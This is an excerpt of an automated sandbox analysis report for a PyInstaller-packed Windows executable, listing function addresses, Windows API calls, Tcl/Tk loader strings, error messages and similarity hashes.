API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction ID: 2643030d86326de2c7a91786dd3cd9a68898d66eafe720b7ef84b51073518927
Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction Fuzzy Hash: 5B217C32A04745CAEB248FA4C4452EC37A5FF05F28F544A39E61D86AC5DF38ED85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C64A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C640D

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: cb91ecab3abe36ba48d6036aba1a6917d28b1669c78d1384ef2ab3a7ff8aec4e
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: 94113B21E1C681C1EA709F55940127AA264BF97FA4F984479EE8E87A86DF7CED40C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D6CAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D6CCF

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction ID: 95aa5252910ea0fe1f3448bf82710efe7573e1c121d6cf2eecf3b11101587941
Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction Fuzzy Hash: 35214C32A18A85C6DB618F18E44077976A0FF85F64F644338EA5D866DADF3DDC05CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C04FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C0550

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: 381e27f83dc42baed944a9013fb80e23ba9196fbf4d686c88af136394d4b7152
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: 4901C421A08741C1EA04DB56991016EA691BF97FF0F184638EEAC97BDACF3CEC01C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C827C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C82A7

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 94f8dedca99e8e5f97d7803b63f363a8ae8936c7a006dfc60ce4e9976b5f5c5f
Instruction ID: 1dfc6029bad99adca8b58393b94018e56e759a8e323264059e7a10afd8472808
Opcode Fuzzy Hash: 94f8dedca99e8e5f97d7803b63f363a8ae8936c7a006dfc60ce4e9976b5f5c5f
Instruction Fuzzy Hash: 6D116A36A18A42C2F3109B14A84406976A4FF82F60F65013DEA8EC76D2DF3CFC11D758

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CF158 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6850CB9A6,?,?,?,00007FF6850CAB67,?,?,00000000,00007FF6850CAE02), ref: 00007FF6850CF1AD

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction ID: c8135731370953c23dc3149f34d71d6e8f24319b69051cf47bf08a383d918018
Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction Fuzzy Hash: 02F01D55B09606C1FE689762D9212B952917F8AFA0F4C5539CD0EC63D2DF5CEC81CA31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CDBBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF6850C0D24,?,?,?,00007FF6850C2236,?,?,?,?,?,00007FF6850C3829), ref: 00007FF6850CDBFA

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction ID: 0bc7f4aaac11278011543a9038dcb47972db97b484f6d0df2093063360d32009
Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction Fuzzy Hash: E4F0DA12A0D28BC5FE78666299512B516907F86FB5F084678DD2EC66C2DF5CBC50C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C5310 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850CF764: DeleteCriticalSection.KERNEL32 ref: 00007FF6850CF7D7

DeleteCriticalSection.KERNEL32 ref: 00007FF6850C5341

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: 5f4f7c98055b7df98e08c70d5aed4f044aeab7e041fa947f6bb40918b24a7818
Instruction ID: 2ace2486c0bd5e81b1f2357c791333c1193831c928f4f6b541ce710b822ee60e
Opcode Fuzzy Hash: 5f4f7c98055b7df98e08c70d5aed4f044aeab7e041fa947f6bb40918b24a7818
Instruction Fuzzy Hash: 26F06559E09902C1FB60AB66E8A13782360BFD9F35F50013DD84EC62B3CF6CAC94C225

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B83E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
Instruction ID: 58994137a761e722cd9574ae7d8486a941b4487db5b1f0974775cf9d40c465a5
Opcode Fuzzy Hash: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
Instruction Fuzzy Hash: 9541C516D1C685C1EB11AB24D5512FC2360FFA5B54F44A23ADF8D922A3EF28EAC8D301

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6850B6EF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6850B6F07
GetProcAddress.KERNEL32 ref: 00007FF6850B6F46
GetProcAddress.KERNEL32 ref: 00007FF6850B6F6B
GetProcAddress.KERNEL32 ref: 00007FF6850B6F90
GetProcAddress.KERNEL32 ref: 00007FF6850B6FB8
GetProcAddress.KERNEL32 ref: 00007FF6850B6FE0
GetProcAddress.KERNEL32 ref: 00007FF6850B7008
GetProcAddress.KERNEL32 ref: 00007FF6850B7030
GetProcAddress.KERNEL32 ref: 00007FF6850B7058

Strings

Failed to get address for Tcl_ConditionWait, xrefs: 00007FF6850B7132
Failed to get address for Tcl_MutexLock, xrefs: 00007FF6850B7092
Tcl_ThreadQueueEvent, xrefs: 00007FF6850B713E
Tcl_DeleteInterp, xrefs: 00007FF6850B6FFE
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF6850B729A
Failed to get address for Tcl_Alloc, xrefs: 00007FF6850B7362
Failed to get address for Tcl_EvalFile, xrefs: 00007FF6850B72EA
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF6850B706A
Tcl_FinalizeThread, xrefs: 00007FF6850B6FD6
Tcl_EvalObjv, xrefs: 00007FF6850B731E
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF6850B73DA
Failed to get address for Tcl_GetVar2, xrefs: 00007FF6850B71AA
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF6850B71FA
Tcl_DoOneEvent, xrefs: 00007FF6850B6F86
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF6850B733A
Failed to get address for Tcl_EvalEx, xrefs: 00007FF6850B7312
Tcl_CreateInterp, xrefs: 00007FF6850B6F3C
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF6850B715A
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF6850B7272
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF6850B70E2
Tcl_SetVar2, xrefs: 00007FF6850B71B6
Tcl_EvalFile, xrefs: 00007FF6850B72CE
Tcl_MutexUnlock, xrefs: 00007FF6850B709E
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF6850B6FF2
Tcl_ConditionFinalize, xrefs: 00007FF6850B70C6
Tcl_ConditionWait, xrefs: 00007FF6850B7116
Tcl_Free, xrefs: 00007FF6850B736E
Tcl_NewStringObj, xrefs: 00007FF6850B722E
Tcl_GetVar2, xrefs: 00007FF6850B718E
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF6850B72C2
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF6850B7182
Failed to get address for Tcl_SetVar2, xrefs: 00007FF6850B71D2
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF6850B6F7D
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF6850B70BA
Tcl_CreateObjCommand, xrefs: 00007FF6850B71DE
Failed to get address for Tcl_Init, xrefs: 00007FF6850B6F19
Failed to get address for Tcl_CreateThread, xrefs: 00007FF6850B7042
Tcl_Finalize, xrefs: 00007FF6850B6FAE
Tcl_GetObjResult, xrefs: 00007FF6850B72A6
Tcl_CreateThread, xrefs: 00007FF6850B7026
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF6850B710A
Tcl_EvalEx, xrefs: 00007FF6850B72F6
Tk_Init, xrefs: 00007FF6850B7396
Tcl_Alloc, xrefs: 00007FF6850B7346
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF6850B6FA2
Tcl_SetVar2Ex, xrefs: 00007FF6850B727E
Tcl_ConditionNotify, xrefs: 00007FF6850B70EE
Failed to get address for Tcl_Finalize, xrefs: 00007FF6850B6FCA
Tcl_FindExecutable, xrefs: 00007FF6850B6F61
Tcl_ThreadAlert, xrefs: 00007FF6850B7166
Tcl_MutexLock, xrefs: 00007FF6850B7076
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF6850B724A
Failed to get address for Tcl_GetString, xrefs: 00007FF6850B7222
Tcl_Init, xrefs: 00007FF6850B6F00
Tcl_NewByteArrayObj, xrefs: 00007FF6850B7256
Tcl_GetCurrentThread, xrefs: 00007FF6850B704E
Tk_GetNumMainWindows, xrefs: 00007FF6850B73BE
Tcl_GetString, xrefs: 00007FF6850B7206
GetProcAddress, xrefs: 00007FF6850B6F20
Failed to get address for Tcl_Free, xrefs: 00007FF6850B738A
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF6850B6F58
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF6850B701A
Failed to get address for Tk_Init, xrefs: 00007FF6850B73B2

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction ID: 68286e75b19e31f288ff51c55026d9acb48f2557983e10f43c3e8c61e94ca195
Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction Fuzzy Hash: E4E1BF66E4EB07D0FA559F08A89017467A1BF04FB0B94527DD80EC63A8EF7CBD48C611

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B1F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF6850B1F9E
MulDiv.KERNEL32 ref: 00007FF6850B1FB2
MulDiv.KERNEL32 ref: 00007FF6850B1FD3
SystemParametersInfoW.USER32 ref: 00007FF6850B201B
CreateFontIndirectW.GDI32 ref: 00007FF6850B202F
#380.COMCTL32 ref: 00007FF6850B2053
CreateWindowExW.USER32 ref: 00007FF6850B20A6
CreateWindowExW.USER32 ref: 00007FF6850B2100
CreateWindowExW.USER32 ref: 00007FF6850B215D
CreateWindowExW.USER32 ref: 00007FF6850B21BF
SendMessageW.USER32 ref: 00007FF6850B21DF
SendMessageW.USER32 ref: 00007FF6850B21F9
SendMessageW.USER32 ref: 00007FF6850B2218
SendMessageW.USER32 ref: 00007FF6850B2237
SendMessageW.USER32 ref: 00007FF6850B2255
SendMessageW.USER32 ref: 00007FF6850B2273
SendMessageW.USER32 ref: 00007FF6850B2291
SendMessageW.USER32 ref: 00007FF6850B22A9
SendMessageW.USER32 ref: 00007FF6850B22C1
GetClientRect.USER32 ref: 00007FF6850B22D0

Part of subcall function 00007FF6850B23F0: GetDC.USER32 ref: 00007FF6850B241B
Part of subcall function 00007FF6850B23F0: SelectObject.GDI32 ref: 00007FF6850B2462
Part of subcall function 00007FF6850B23F0: DrawTextW.USER32 ref: 00007FF6850B2485
Part of subcall function 00007FF6850B23F0: SelectObject.GDI32 ref: 00007FF6850B249B
Part of subcall function 00007FF6850B23F0: ReleaseDC.USER32 ref: 00007FF6850B24AB
Part of subcall function 00007FF6850B23F0: MoveWindow.USER32 ref: 00007FF6850B24FB
Part of subcall function 00007FF6850B23F0: MoveWindow.USER32 ref: 00007FF6850B253B
Part of subcall function 00007FF6850B23F0: MoveWindow.USER32 ref: 00007FF6850B258E

Strings

EDIT, xrefs: 00007FF6850B210B
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF6850B1F7D
Close, xrefs: 00007FF6850B2168
STATIC, xrefs: 00007FF6850B205C, 00007FF6850B20B1
BUTTON, xrefs: 00007FF6850B2176

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: cd4c3d4ab82a869cd4f6a388528ff0ff20e2d66d214a81f8c1b3395e019fc999
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: 02A16936608B85C7E714CF11E4947AAB760FB88B94F508229EB9D83B24CF7DE564CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D471C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6850D476A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D4DD6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D4F4C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D520A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D542A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D5667
memcpy_s.LIBCPMT ref: 00007FF6850D5742
memcpy_s.LIBCPMT ref: 00007FF6850D57ED
memcpy_s.LIBCPMT ref: 00007FF6850D58BC

Strings

1#IND, xrefs: 00007FF6850D4857
1#INF, xrefs: 00007FF6850D4893
1#SNAN, xrefs: 00007FF6850D487A
1#QNAN, xrefs: 00007FF6850D4883

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction ID: 4bc7e42d33b5f4d1e9737f5dc3d7a27176ad7cc8c3124c288a93242de1de0142
Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction Fuzzy Hash: 29B2E376E19282CBE7648E64D4407FD77A1FF54BA9F501239DA0D9BA88DF78AD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B8560 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF6850B2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B8587
FormatMessageW.KERNEL32 ref: 00007FF6850B85B6
WideCharToMultiByte.KERNEL32 ref: 00007FF6850B860C

Part of subcall function 00007FF6850B29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6850B87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B2A14
Part of subcall function 00007FF6850B29E0: MessageBoxW.USER32 ref: 00007FF6850B2AF0

Strings

WideCharToMultiByte, xrefs: 00007FF6850B861D
FormatMessageW, xrefs: 00007FF6850B85C7
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6850B8616
PyInstaller: FormatMessageW failed., xrefs: 00007FF6850B85D3
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF6850B8629
No error messages generated., xrefs: 00007FF6850B85C0

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction ID: bd9e52e57a9740f54f92dc2c417a89613cd7d737dfa0b4e29fc9e41b8b31fb28
Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction Fuzzy Hash: D6215071A08A47C2FB60EB15E8942666361FF88BA4F84013DE54DC36A4DF3CD945DB01

Uniqueness

Uniqueness Score: -1.00%

